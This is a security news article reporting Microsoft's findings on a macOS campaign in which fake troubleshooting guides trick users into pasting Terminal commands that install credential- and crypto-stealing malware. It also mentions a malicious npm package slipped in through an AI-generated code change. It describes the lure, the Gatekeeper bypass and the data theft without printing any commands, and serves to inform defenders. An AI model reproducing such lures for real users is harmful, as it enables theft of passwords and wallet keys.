Fake macOS guides trick users into installing ClickFix malware
Since late 2025 attackers posted fake macOS guides that tell users to paste Terminal commands which install ClickFix malware to steal iCloud data, saved passwords and crypto wallet keys, Microsoft reports.
Microsoft’s Defender Security Research Team reported that since late 2025 attackers have posted fake macOS troubleshooting guides on platforms including Medium, Craft and Squarespace. The pages present fixes for common Mac problems and instruct readers to copy a single command into Terminal; that command downloads and executes a script that installs malware called ClickFix.
Because victims run the command directly in Terminal, macOS Gatekeeper does not inspect the downloaded code. Gatekeeper normally checks code signing and notarization for apps opened through Finder; the ClickFix technique shifts execution to the user and bypasses those bundle checks.
Researchers identified three related components used in the campaign-a loader, a script and a helper-that work together to harvest data, establish persistence and send stolen information to attacker-controlled servers. Malware families observed in infections include AMOS, Macsync and SHub Stealer. Infected machines are searched for iCloud and Telegram credentials, saved usernames and passwords in Chrome and Firefox, private documents and photos under 2 megabytes, and cryptocurrency wallet keys from apps such as Exodus, Ledger and Trezor.
After installation the malware displays a fake dialog requesting the system password to install a helper tool. If the user provides credentials, attackers gain broad access to files and system settings. In some cases researchers found legitimate wallet applications removed and replaced with trojanized versions that monitor transactions and enable theft.
Parts of the campaign use native macOS utilities such as curl and osascript to pull and run code directly in memory, reducing reliance on disk files and complicating detection by standard antivirus products. Investigators also observed a built-in kill switch: the loader halts if it detects a Russian keyboard layout.
Security researchers reported other operations that reuse the ClickFix-style social engineering. One operation targeted fintech and crypto developers on macOS with fake meeting invitations. A separate supply-chain intrusion introduced a malicious npm package into a crypto trading project through an AI-generated code change, allowing attackers to harvest wallet data and system secrets.
The activity has been active since late 2025 and focuses on macOS users searching online for troubleshooting help.
Content on BlockPort is provided for informational purposes only and does not constitute financial guidance.
We strive to ensure the accuracy and relevance of the information we share, but we do not guarantee that all content is complete, error-free, or up to date. BlockPort disclaims any liability for losses, mistakes, or actions taken based on the material found on this site.
Always conduct your own research before making financial decisions and consider consulting with a licensed advisor.
For further details, please review our Terms of Use, Privacy Policy, and Disclaimer.
Articles by this author
